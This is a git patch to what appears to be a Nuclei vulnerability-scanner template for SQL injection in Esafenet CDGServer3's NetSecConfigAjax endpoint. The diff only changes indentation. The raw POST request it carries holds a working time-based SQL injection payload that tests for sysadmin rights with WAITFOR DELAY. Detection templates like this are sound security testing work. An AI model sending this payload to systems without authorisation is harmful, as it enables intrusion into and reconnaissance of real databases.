From 7cbcdb15079bf4d922cfbac1664d03c93e835a32 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 24 Jul 2024 16:46:08 +0530 Subject: [PATCH] Update esafenet-netsecconfigajax-sqli.yaml --- .../esafenet/esafenet-netsecconfigajax-sqli.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml index ed12954a22..6d9097fe21 100644 --- a/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml +++ b/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-sqli.yaml @@ -15,12 +15,12 @@ info: http: - raw: - - | - POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + - | + POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-- + command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'-- matchers: - type: dsl